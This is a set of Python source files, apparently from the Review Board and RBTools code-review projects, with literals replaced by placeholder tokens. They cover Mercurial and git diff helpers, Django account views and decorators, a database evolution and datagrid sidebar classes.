_handle_empty_files ( diff , revisions [ '<STR_LIT>' ] , <EOL> revisions [ '<STR_LIT>' ] , <EOL> exclude_files = exclude_patterns ) <EOL> if '<STR_LIT>' in revisions : <EOL> base_commit_id = revisions [ '<STR_LIT>' ] <EOL> parent_diff = self . _execute ( <EOL> diff_cmd + [ '<STR_LIT>' , base_commit_id , '<STR_LIT>' , revisions [ '<STR_LIT>' ] ] , <EOL> env = self . _hg_env , results_unicode = False ) <EOL> if supports_empty_files : <EOL> parent_diff = self . _handle_empty_files ( <EOL> parent_diff , <EOL> base_commit_id , <EOL> revisions [ '<STR_LIT>' ] , <EOL> exclude_files = exclude_patterns ) <EOL> else : <EOL> base_commit_id = revisions [ '<STR_LIT>' ] <EOL> parent_diff = None <EOL> base_commit_id = self . _execute ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , base_commit_id , '<STR_LIT>' ] , <EOL> env = self . _hg_env , results_unicode = False ) <EOL> return { <EOL> '<STR_LIT>' : diff , <EOL> '<STR_LIT>' : parent_diff , <EOL> '<STR_LIT>' : revisions . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : base_commit_id , <EOL> } <EOL> def _handle_empty_files ( self , diff , base , tip , exclude_files = [ ] ) : <EOL> """<STR_LIT>""" <EOL> base_files = self . _get_files_in_changeset ( base ) <EOL> tip_files = self . _get_files_in_changeset ( tip ) <EOL> if base_files == tip_files : <EOL> return diff <EOL> tip_empty_files = self . _get_files_in_changeset ( tip , get_empty = True ) <EOL> added_empty_files = tip_empty_files - base_files <EOL> base_empty_files = self . _get_files_in_changeset ( base , get_empty = True ) <EOL> deleted_empty_files = base_empty_files - tip_files <EOL> if not ( added_empty_files or deleted_empty_files ) : <EOL> return diff <EOL> dates = execute ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , base , '<STR_LIT>' , tip , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> env = self . _hg_env ) <EOL> base_date , tip_date = dates . strip ( ) . 
split ( '<STR_LIT:\t>' ) <EOL> for filename in added_empty_files : <EOL> if filename not in exclude_files : <EOL> diff += ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( base , tip , filename , <EOL> self . PRE_CREATION , self . PRE_CREATION_DATE , <EOL> filename , tip_date ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> for filename in deleted_empty_files : <EOL> if filename not in exclude_files : <EOL> diff += ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( base , tip , filename , <EOL> filename , base_date , <EOL> self . PRE_CREATION , <EOL> self . PRE_CREATION_DATE ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> return diff <EOL> def _get_files_in_changeset ( self , rev , get_empty = False ) : <EOL> """<STR_LIT>""" <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , rev ] <EOL> if get_empty : <EOL> cmd . append ( '<STR_LIT>' ) <EOL> files = execute ( cmd , env = self . _hg_env , ignore_errors = True , <EOL> none_on_ignored_error = True ) <EOL> if files : <EOL> files = files . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> return set ( files . splitlines ( ) ) <EOL> return set ( ) <EOL> def _get_parent_for_hgsubversion ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( getattr ( self . options , '<STR_LIT>' , None ) or <EOL> execute ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) . strip ( ) ) <EOL> def _get_remote_branch ( self ) : <EOL> """<STR_LIT>""" <EOL> remote = getattr ( self . options , '<STR_LIT>' , None ) <EOL> if not remote : <EOL> try : <EOL> remote = self . 
_remote_path [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> remote = None <EOL> if not remote : <EOL> die ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return remote <EOL> def create_commit ( self , message , author , run_editor , <EOL> files = [ ] , all_files = False ) : <EOL> """<STR_LIT>""" <EOL> if run_editor : <EOL> modified_message = edit_text ( message ) <EOL> else : <EOL> modified_message = message <EOL> hg_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , modified_message , <EOL> '<STR_LIT>' % ( author . fullname , author . email ) ] <EOL> execute ( hg_command + files ) <EOL> def _get_current_branch ( self ) : <EOL> """<STR_LIT>""" <EOL> return execute ( [ '<STR_LIT>' , '<STR_LIT>' ] , env = self . _hg_env ) . strip ( ) <EOL> def _get_bottom_and_top_outgoing_revs_for_remote ( self , rev = None ) : <EOL> """<STR_LIT>""" <EOL> remote = self . _get_remote_branch ( ) <EOL> current_branch = self . _get_current_branch ( ) <EOL> outgoing = [ o for o in self . _get_outgoing_changesets ( remote , rev = rev ) <EOL> if current_branch == o [ <NUM_LIT:2> ] ] <EOL> if outgoing : <EOL> top_rev , bottom_rev = self . _get_top_and_bottom_outgoing_revs ( outgoing ) <EOL> else : <EOL> top_rev = None <EOL> bottom_rev = None <EOL> return bottom_rev , top_rev <EOL> def _get_outgoing_changesets ( self , remote , rev = None ) : <EOL> """<STR_LIT>""" <EOL> outgoing_changesets = [ ] <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> remote ] <EOL> if rev : <EOL> args . extend ( [ '<STR_LIT>' , rev ] ) <EOL> raw_outgoing = execute ( args , <EOL> env = self . _hg_env , <EOL> extra_ignore_errors = ( <NUM_LIT:1> , ) ) <EOL> for line in raw_outgoing . splitlines ( ) : <EOL> if not line : <EOL> continue <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> rev , node , branch = [ f . strip ( ) for f in line . split ( '<STR_LIT:\t>' ) ] <EOL> branch = branch or '<STR_LIT:default>' <EOL> if not rev . 
isdigit ( ) : <EOL> raise Exception ( '<STR_LIT>' % line ) <EOL> logging . debug ( '<STR_LIT>' % ( rev , node ) ) <EOL> outgoing_changesets . append ( ( int ( rev ) , node , branch ) ) <EOL> return outgoing_changesets <EOL> def _get_top_and_bottom_outgoing_revs ( self , outgoing_changesets ) : <EOL> revs = set ( t [ <NUM_LIT:0> ] for t in outgoing_changesets ) <EOL> top_rev = max ( revs ) <EOL> bottom_rev = min ( revs ) <EOL> for rev , node , branch in reversed ( outgoing_changesets ) : <EOL> parents = execute ( <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , str ( rev ) , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> env = self . _hg_env ) <EOL> parents = re . split ( '<STR_LIT>' , parents ) <EOL> parents = [ int ( p ) for p in parents if p != '<STR_LIT>' ] <EOL> parents = [ p for p in parents if p not in outgoing_changesets ] <EOL> if len ( parents ) > <NUM_LIT:0> : <EOL> bottom_rev = parents [ <NUM_LIT:0> ] <EOL> break <EOL> else : <EOL> bottom_rev = rev - <NUM_LIT:1> <EOL> bottom_rev = max ( <NUM_LIT:0> , bottom_rev ) <EOL> return top_rev , bottom_rev <EOL> def scan_for_server ( self , repository_info ) : <EOL> server_url = super ( MercurialClient , self ) . scan_for_server ( repository_info ) <EOL> if not server_url and self . hgrc . get ( '<STR_LIT>' ) : <EOL> server_url = self . hgrc . get ( '<STR_LIT>' ) . strip ( ) <EOL> if not server_url and self . _type == "<STR_LIT>" : <EOL> prop = SVNClient ( ) . scan_for_server_property ( repository_info ) <EOL> if prop : <EOL> return prop <EOL> return server_url <EOL> def _execute ( self , cmd , * args , ** kwargs ) : <EOL> if not self . hidden_changesets_supported and '<STR_LIT>' in cmd : <EOL> cmd = [ p for p in cmd if p != '<STR_LIT>' ] <EOL> cmd . extend ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % self . 
_hgext_path <EOL> ] ) <EOL> return execute ( cmd , * args , ** kwargs ) <EOL> def has_pending_changes ( self ) : <EOL> """<STR_LIT>""" <EOL> status = execute ( [ '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return status != '<STR_LIT>' <EOL> def apply_patch ( self , patch_file , base_path = None , base_dir = None , p = None , <EOL> revert = False ) : <EOL> """<STR_LIT>""" <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if p : <EOL> cmd += [ '<STR_LIT>' , p ] <EOL> cmd . append ( patch_file ) <EOL> rc , data = self . _execute ( cmd , with_errors = True , return_error_code = True ) <EOL> return PatchResult ( applied = ( rc == <NUM_LIT:0> ) , patch_output = data ) <EOL> def apply_patch_for_empty_files ( self , patch , p_num , revert = False ) : <EOL> """<STR_LIT>""" <EOL> patched_empty_files = False <EOL> added_files = re . findall ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> % ( self . PRE_CREATION , <EOL> re . escape ( self . PRE_CREATION_DATE ) ) , patch ) <EOL> deleted_files = re . findall ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> % ( self . PRE_CREATION , <EOL> re . escape ( self . PRE_CREATION_DATE ) ) , <EOL> patch ) <EOL> if added_files : <EOL> added_files = self . _strip_p_num_slashes ( added_files , int ( p_num ) ) <EOL> make_empty_files ( added_files ) <EOL> result = execute ( [ '<STR_LIT>' , '<STR_LIT>' ] + added_files , ignore_errors = True , <EOL> none_on_ignored_error = True ) <EOL> if result is None : <EOL> logging . error ( '<STR_LIT>' , <EOL> '<STR_LIT:U+002CU+0020>' . join ( added_files ) ) <EOL> else : <EOL> patched_empty_files = True <EOL> if deleted_files : <EOL> deleted_files = self . _strip_p_num_slashes ( deleted_files , <EOL> int ( p_num ) ) <EOL> result = execute ( [ '<STR_LIT>' , '<STR_LIT>' ] + deleted_files , <EOL> ignore_errors = True , none_on_ignored_error = True ) <EOL> if result is None : <EOL> logging . 
error ( '<STR_LIT>' , <EOL> '<STR_LIT:U+002CU+0020>' . join ( deleted_files ) ) <EOL> else : <EOL> patched_empty_files = True <EOL> return patched_empty_files <EOL> def supports_empty_files ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . capabilities and <EOL> self . capabilities . has_capability ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> def get_current_bookmark ( self ) : <EOL> """<STR_LIT>""" <EOL> return execute ( [ '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' ] , ignore_errors = True ) . strip ( ) </s>
<s> import six <EOL> from collections import defaultdict <EOL> from copy import deepcopy <EOL> from rbtools . hooks . common import execute , get_review_request_id <EOL> def get_branch_name ( ref_name ) : <EOL> """<STR_LIT>""" <EOL> branch_ref_prefix = '<STR_LIT>' <EOL> if ref_name . startswith ( branch_ref_prefix ) : <EOL> return ref_name [ len ( branch_ref_prefix ) : ] <EOL> def get_commit_hashes ( old_rev , new_rev ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> % ( old_rev , new_rev ) ] <EOL> return execute ( git_command ) . split ( '<STR_LIT:\n>' ) <EOL> def get_unique_commit_hashes ( ref_name , new_rev ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , new_rev , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> git_command . extend ( get_excluded_branches ( ref_name ) ) <EOL> return execute ( git_command ) . strip ( ) . split ( '<STR_LIT:\n>' ) <EOL> def get_excluded_branches ( ref_name ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> all_branches = execute ( git_command ) . strip ( ) . split ( '<STR_LIT:\n>' ) <EOL> return [ branch . strip ( ) for branch in all_branches if branch != ref_name ] <EOL> def get_branches_containing_commit ( commit_hash ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , commit_hash ] <EOL> branches = execute ( git_command ) . replace ( '<STR_LIT:*>' , '<STR_LIT>' ) . split ( '<STR_LIT:\n>' ) <EOL> return [ branch . strip ( ) for branch in branches ] <EOL> def get_commit_message ( commit ) : <EOL> """<STR_LIT>""" <EOL> git_command = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , commit ] <EOL> return execute ( git_command ) . 
strip ( ) <EOL> def get_review_id_to_commits_map ( lines , regex ) : <EOL> """<STR_LIT>""" <EOL> review_id_to_commits_map = defaultdict ( list ) <EOL> new_branches = [ ] <EOL> null_sha1 = '<STR_LIT:0>' * <NUM_LIT> <EOL> for line in lines : <EOL> old_rev , new_rev , ref_name = line . split ( ) <EOL> branch_name = get_branch_name ( ref_name ) <EOL> if not branch_name or new_rev == null_sha1 : <EOL> continue <EOL> if old_rev == null_sha1 : <EOL> new_branches . append ( branch_name ) <EOL> commit_hashes = get_unique_commit_hashes ( ref_name , new_rev ) <EOL> else : <EOL> commit_hashes = get_commit_hashes ( old_rev , new_rev ) <EOL> for commit_hash in commit_hashes : <EOL> if commit_hash : <EOL> commit_message = get_commit_message ( commit_hash ) <EOL> review_request_id = get_review_request_id ( regex , <EOL> commit_message ) <EOL> commit = '<STR_LIT>' % ( branch_name , commit_hash ) <EOL> review_id_to_commits_map [ review_request_id ] . append ( commit ) <EOL> if new_branches : <EOL> review_id_to_commits_map_copy = deepcopy ( review_id_to_commits_map ) <EOL> for review_id , commit_list in six . iteritems ( <EOL> review_id_to_commits_map_copy ) : <EOL> for commit in commit_list : <EOL> commit_branch = commit [ : commit . find ( '<STR_LIT:(>' ) - <NUM_LIT:1> ] <EOL> if commit_branch in new_branches : <EOL> continue <EOL> commit_hash = commit [ commit . find ( '<STR_LIT:(>' ) + <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> commit_branches = get_branches_containing_commit ( commit_hash ) <EOL> for branch in set ( new_branches ) . intersection ( commit_branches ) : <EOL> new_commit = '<STR_LIT>' % ( branch , commit_hash ) <EOL> review_id_to_commits_map [ review_id ] . append ( new_commit ) <EOL> return review_id_to_commits_map </s>
# Developer utility script: clones the current git tree into a temp
# directory, performs one-time database setup there, then checks out each
# branch named on the command line and runs management commands against it.
#
# NOTE(review): command/message literals in this view are tokenizer
# placeholders ('<STR_LIT>'), so the exact subcommands are not recoverable.
from __future__ import print_function, unicode_literals
import os
import shutil
import subprocess
import sys
import tempfile
from optparse import OptionParser

# Parsed OptionParser values; populated by parse_options().
options = None


def die(msg):
    """Write ``msg`` to stderr and exit with a failure status."""
    sys.stderr.write(msg)
    sys.exit(<NUM_LIT:1>)


def clone_git_tree(git_dir):
    """Clone ``git_dir`` into a fresh temp directory and chdir into it.

    Returns the path of the new clone.  Note the working-directory side
    effect: the process stays chdir'd into the clone afterwards.
    """
    new_git_dir = tempfile.mkdtemp(prefix='<STR_LIT>')
    os.chdir(new_git_dir)
    execute(['<STR_LIT>', '<STR_LIT>', git_dir, '<STR_LIT:.>'])
    return new_git_dir


def execute(cmdline, return_errcode=False, show_output=True):
    """Run a command, echoing and capturing its stdout.

    Returns the captured output, or ``(output, returncode)`` when
    ``return_errcode`` is True.  Without ``return_errcode``, a non-zero
    exit status terminates the whole script via die().

    NOTE(review): output chunks are concatenated onto a str with ``+=``;
    on Python 3 ``p.stdout`` yields bytes, so this looks Python 2-only --
    confirm the intended interpreter before reusing.
    """
    if isinstance(cmdline, list):
        print("<STR_LIT>" % subprocess.list2cmdline(cmdline))
    else:
        print("<STR_LIT>" % cmdline)
    p = subprocess.Popen(cmdline,
                         shell=False,
                         stdout=subprocess.PIPE)
    s = '<STR_LIT>'
    for data in p.stdout.readlines():
        s += data
        if show_output:
            sys.stdout.write(data)
    rc = p.wait()
    if return_errcode:
        return s, rc
    if rc != <NUM_LIT:0>:
        die("<STR_LIT>")
    return s


def run_python(cmdline, *args, **kwargs):
    """Run ``cmdline`` under the current Python interpreter via execute()."""
    return execute([sys.executable] + cmdline, *args, **kwargs)


def clean_pyc():
    """Delete stale compiled Python files below the current directory."""
    for root, dirs, files in os.walk(os.getcwd()):
        for filename in files:
            if filename.endswith('<STR_LIT>'):
                os.unlink(os.path.join(root, filename))


def parse_options(args):
    """Parse command-line options into the module-level ``options``.

    Returns the remaining positional arguments (branch names).
    """
    global options
    parser = OptionParser(usage='<STR_LIT>')
    # Four database-connection options; dest names are placeholders here,
    # but main() later reads them as db_type/db_name/db_user/db_password.
    parser.add_option('<STR_LIT>', dest='<STR_LIT>',
                      default='<STR_LIT>',
                      help="<STR_LIT>")
    parser.add_option('<STR_LIT>', dest='<STR_LIT>',
                      default='<STR_LIT>',
                      help="<STR_LIT>")
    parser.add_option('<STR_LIT>', dest='<STR_LIT>',
                      default='<STR_LIT>',
                      help="<STR_LIT>")
    parser.add_option('<STR_LIT>', dest='<STR_LIT>',
                      default='<STR_LIT>',
                      help="<STR_LIT>")
    options, args = parser.parse_args(args)
    return args


def main():
    # Require enough command-line arguments before doing any work.
    if len(sys.argv) <= <NUM_LIT:2>:
        die('<STR_LIT>')
    # Sanity-check that we're run from the expected top-level directory.
    if not os.path.exists("<STR_LIT>"):
        die("<STR_LIT>")
    branches = parse_options(sys.argv[<NUM_LIT:1>:])
    # Validate every branch name up front so we fail before cloning.
    for branch in branches:
        errcode = execute(['<STR_LIT>', '<STR_LIT>', branch],
                          return_errcode=True, show_output=False)[<NUM_LIT:1>]
        if errcode != <NUM_LIT:0>:
            die('<STR_LIT>' % branch)
    cur_dir = os.getcwd()
    git_dir = clone_git_tree(cur_dir)
    print('<STR_LIT>' % git_dir)
    # One-time database setup using the parsed connection options.
    run_python(['<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>' % options.db_type,
                '<STR_LIT>' % options.db_name,
                '<STR_LIT>' % options.db_user,
                '<STR_LIT>' % options.db_password])
    # Per branch: check it out, drop stale compiled files, and run two
    # management commands against the branch's code.
    # NOTE(review): loop membership inferred from the token stream --
    # confirm the commands are intended to run once per branch.
    for branch in branches:
        execute(['<STR_LIT>', '<STR_LIT>', branch])
        clean_pyc()
        run_python(['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'])
        run_python(['<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                    '<STR_LIT>'])
    # Restore the original working directory before removing the clone.
    os.chdir(cur_dir)
    shutil.rmtree(git_dir)
    print()
    print("<STR_LIT>")
    print("<STR_LIT>")
    print("<STR_LIT>")


if __name__ == '<STR_LIT:__main__>':
    main()
from __future__ import unicode_literals
from django.contrib.auth.decorators import login_required
from djblets.siteconfig.models import SiteConfiguration
from djblets.util.decorators import simple_decorator
from reviewboard.accounts.models import Profile


@simple_decorator
def check_login_required(view_func):
    """Wrap a view so login is required only when the site config says so.

    The flag is read from the live SiteConfiguration on every request, so
    an admin can flip it without a restart.
    """
    def _wrapped(*args, **kwargs):
        siteconfig = SiteConfiguration.objects.get_current()
        if not siteconfig.get("<STR_LIT>"):
            # Anonymous access allowed: call the view directly.
            return view_func(*args, **kwargs)
        return login_required(view_func)(*args, **kwargs)
    return _wrapped


@simple_decorator
def valid_prefs_required(view_func):
    """Wrap a view, ensuring an authenticated user has a Profile row."""
    def _wrapped(request, *args, **kwargs):
        if request.user.is_authenticated():
            # Lazily create the profile on first authenticated access.
            Profile.objects.get_or_create(user=request.user)
        return view_func(request, *args, **kwargs)
    return _wrapped
from __future__ import unicode_literals
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_protect
from djblets.auth.views import register
from djblets.configforms.views import ConfigPagesView
from djblets.siteconfig.models import SiteConfiguration
from djblets.util.decorators import augment_method_from
from reviewboard.accounts.backends import get_enabled_auth_backends
from reviewboard.accounts.forms.registration import RegistrationForm
from reviewboard.accounts.pages import get_page_classes


@csrf_protect
def account_register(request, next_url='<STR_LIT>'):
    """Serve new-user registration when the site allows it.

    Registration is available only when the primary auth backend supports
    it and the corresponding siteconfig flag is enabled; otherwise the
    user is redirected to a fallback URL (placeholder literal).
    """
    siteconfig = SiteConfiguration.objects.get_current()
    auth_backends = get_enabled_auth_backends()
    # Only the first (primary) backend decides whether registration is
    # supported.
    if (auth_backends[<NUM_LIT:0>].supports_registration and
        siteconfig.get("<STR_LIT>")):
        response = register(request, next_page=reverse(next_url),
                            form_class=RegistrationForm)
        return response
    return HttpResponseRedirect(reverse("<STR_LIT>"))


class MyAccountView(ConfigPagesView):
    """Multi-page account configuration view built on ConfigPagesView."""

    title = _('<STR_LIT>')

    # Static asset bundles loaded for this view (names are placeholders).
    css_bundle_names = [
        '<STR_LIT>',
    ]
    js_bundle_names = [
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
    ]

    @method_decorator(login_required)
    @augment_method_from(ConfigPagesView)
    def dispatch(self, *args, **kwargs):
        """Dispatch requests, requiring a logged-in user.

        The body is intentionally empty: augment_method_from() reuses the
        parent class's implementation, and login_required wraps it.
        """
        pass

    @property
    def nav_title(self):
        """Return the navigation title (the viewing user's username)."""
        return self.request.user.username

    @property
    def page_classes(self):
        """Return the registered account page classes."""
        return get_page_classes()

    @cached_property
    def ordered_user_local_sites(self):
        """Return the user's local sites ordered by name (computed once)."""
        return self.request.user.local_site.order_by('<STR_LIT:name>')
from __future__ import unicode_literals
from django_evolution.mutations import AddField

from django.db import models

# Database evolution: adds one nullable CharField to an existing model.
# The model/field names and max_length value are placeholder literals in
# this view.
MUTATIONS = [
    AddField('<STR_LIT>', '<STR_LIT>', models.CharField,
             max_length=<NUM_LIT>, null=True)
]
<s> from __future__ import unicode_literals <EOL> from django . template . context import RequestContext <EOL> from django . template . loader import render_to_string <EOL> from django . utils import six <EOL> from django . utils . six . moves . urllib . parse import urlencode <EOL> from reviewboard . site . urlresolvers import local_site_reverse <EOL> class BaseSidebarItem ( object ) : <EOL> """<STR_LIT>""" <EOL> template_name = None <EOL> label = None <EOL> icon_name = None <EOL> view_id = None <EOL> view_args = None <EOL> css_classes = None <EOL> def __init__ ( self , sidebar , datagrid ) : <EOL> """<STR_LIT>""" <EOL> self . sidebar = sidebar <EOL> self . datagrid = datagrid <EOL> def get_url ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . view_id and not self . view_args : <EOL> return None <EOL> if self . view_args : <EOL> url_args = self . view_args . copy ( ) <EOL> else : <EOL> url_args = { } <EOL> if self . view_id : <EOL> url_args [ '<STR_LIT>' ] = self . view_id <EOL> return '<STR_LIT>' % ( self . datagrid . request . path , urlencode ( url_args ) ) <EOL> def get_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def is_visible ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def is_active ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . view_id is None : <EOL> return False <EOL> request = self . datagrid . request <EOL> view_id = request . GET . get ( '<STR_LIT>' , self . sidebar . default_view_id ) <EOL> if view_id != self . view_id : <EOL> return False <EOL> if self . view_args : <EOL> for key , value in six . iteritems ( self . view_args ) : <EOL> if request . GET . get ( key ) != value : <EOL> return False <EOL> return True <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> count = self . get_count ( ) <EOL> context = { <EOL> '<STR_LIT>' : self . datagrid , <EOL> '<STR_LIT:label>' : self . label , <EOL> '<STR_LIT>' : self . icon_name or '<STR_LIT>' , <EOL> '<STR_LIT>' : self . view_id , <EOL> '<STR_LIT>' : self . 
view_args , <EOL> '<STR_LIT:count>' : count , <EOL> '<STR_LIT>' : count is not None , <EOL> '<STR_LIT:url>' : self . get_url ( ) , <EOL> '<STR_LIT>' : self . is_active ( ) , <EOL> '<STR_LIT>' : self . css_classes or [ ] , <EOL> } <EOL> context . update ( self . get_extra_context ( ) ) <EOL> return render_to_string ( self . template_name , <EOL> RequestContext ( self . datagrid . request , context ) ) <EOL> def get_extra_context ( self ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> class BaseSidebarSection ( BaseSidebarItem ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( BaseSidebarSection , self ) . __init__ ( * args , ** kwargs ) <EOL> self . items = list ( self . get_items ( ) ) <EOL> def get_items ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def is_visible ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . items ) > <NUM_LIT:0> <EOL> def get_extra_context ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : self . items , <EOL> } <EOL> class SidebarNavItem ( BaseSidebarItem ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> def __init__ ( self , section , label , icon_name = None , view_id = None , <EOL> view_args = None , count = None , url = None , url_name = None , <EOL> css_classes = None ) : <EOL> """<STR_LIT>""" <EOL> super ( SidebarNavItem , self ) . __init__ ( section . sidebar , section . datagrid ) <EOL> self . label = label <EOL> self . icon_name = icon_name <EOL> self . view_id = view_id <EOL> self . view_args = view_args <EOL> self . count = count <EOL> self . css_classes = css_classes <EOL> self . url = url <EOL> self . url_name = url_name <EOL> def get_url ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . url : <EOL> return self . url <EOL> elif self . url_name : <EOL> return local_site_reverse ( self . url_name , <EOL> request = self . datagrid . 
request ) <EOL> else : <EOL> return super ( SidebarNavItem , self ) . get_url ( ) <EOL> def get_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . count <EOL> class Sidebar ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , item_classes , default_view_id = None , css_classes = [ ] ) : <EOL> """<STR_LIT>""" <EOL> self . _item_classes = [ ] <EOL> self . css_classes = css_classes <EOL> self . default_view_id = default_view_id <EOL> for item_cls in item_classes : <EOL> self . add_item ( item_cls ) <EOL> def add_item ( self , item_cls ) : <EOL> """<STR_LIT>""" <EOL> self . _item_classes . append ( item_cls ) <EOL> def remove_item ( self , item_cls ) : <EOL> """<STR_LIT>""" <EOL> self . _item_classes . remove ( item_cls ) <EOL> def get_items ( self , datagrid ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> item_cls ( self , datagrid ) <EOL> for item_cls in self . _item_classes <EOL> ] <EOL> class DataGridSidebarMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def load_extra_state ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> result = super ( DataGridSidebarMixin , self ) . load_extra_state ( <EOL> * args , ** kwargs ) <EOL> self . sidebar_items = self . sidebar . get_items ( self ) <EOL> return result </s>
<s> from __future__ import unicode_literals <EOL> import os <EOL> import re <EOL> from django . utils import six <EOL> from django . utils . six . moves import range <EOL> from reviewboard . diffviewer . processors import ( filter_interdiff_opcodes , <EOL> post_process_filtered_equals ) <EOL> class MoveRange ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , start , end , groups = [ ] ) : <EOL> self . start = start <EOL> self . end = end <EOL> self . groups = groups <EOL> @ property <EOL> def last_group ( self ) : <EOL> return self . groups [ - <NUM_LIT:1> ] <EOL> def add_group ( self , group , group_index ) : <EOL> if self . groups [ - <NUM_LIT:1> ] != group : <EOL> self . groups . append ( ( group , group_index ) ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . start , self . end , self . groups ) <EOL> class DiffOpcodeGenerator ( object ) : <EOL> ALPHANUM_RE = re . compile ( r'<STR_LIT>' ) <EOL> WHITESPACE_RE = re . compile ( r'<STR_LIT>' ) <EOL> MOVE_PREFERRED_MIN_LINES = <NUM_LIT:2> <EOL> MOVE_MIN_LINE_LENGTH = <NUM_LIT:20> <EOL> TAB_SIZE = <NUM_LIT:8> <EOL> def __init__ ( self , differ , diff = None , interdiff = None ) : <EOL> self . differ = differ <EOL> self . diff = diff <EOL> self . interdiff = interdiff <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . groups = [ ] <EOL> self . removes = { } <EOL> self . inserts = [ ] <EOL> opcodes = self . differ . get_opcodes ( ) <EOL> opcodes = self . _apply_processors ( opcodes ) <EOL> opcodes = self . _generate_opcode_meta ( opcodes ) <EOL> opcodes = self . _apply_meta_processors ( opcodes ) <EOL> self . _group_opcodes ( opcodes ) <EOL> self . _compute_moves ( ) <EOL> for opcodes in self . groups : <EOL> yield opcodes <EOL> def _apply_processors ( self , opcodes ) : <EOL> if self . diff and self . interdiff : <EOL> opcodes = filter_interdiff_opcodes ( opcodes , self . diff , <EOL> self . 
